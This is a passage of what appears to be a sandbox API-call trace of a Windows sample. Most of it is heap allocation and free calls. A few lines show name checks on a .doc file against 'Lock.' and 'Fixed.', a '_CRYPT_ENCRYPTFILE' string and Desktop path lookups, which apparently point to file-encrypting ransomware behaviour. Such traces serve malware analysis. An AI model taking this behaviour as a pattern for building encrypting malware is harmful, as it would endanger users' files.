Size=0x10) returned 0x2e53818 [0185.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IqAWqPLMQZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qAWqPLMQZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AWqPLMQZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WqPLMQZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qPLMQZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PLMQZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LMQZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MQZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pl.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0185.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0185.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0185.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0185.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0185.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0185.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0185.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0185.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0185.748] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0185.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0185.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0185.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0185.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0185.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0185.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0185.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0185.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IqAWqPLMQZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qAWqPLMQZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AWqPLMQZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WqPLMQZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qPLMQZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PLMQZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LMQZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MQZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0185.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pl.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0185.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0185.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0185.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0185.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0185.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0185.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0185.750] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0185.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0185.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0185.750] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0185.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0185.794] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0185.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0185.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0185.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0185.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0185.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0185.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0185.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0185.795] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0185.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0185.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0185.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0185.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0185.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0185.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0185.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0185.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0185.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0185.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0185.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0185.797] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0185.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0185.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0185.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0185.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0185.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0185.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0185.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0185.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0185.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0185.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0185.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0185.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0185.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0185.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0185.803] 